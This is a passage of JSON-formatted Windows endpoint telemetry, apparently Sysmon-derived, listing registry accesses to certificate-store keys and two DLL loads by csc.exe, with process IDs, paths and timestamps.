"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859800000, 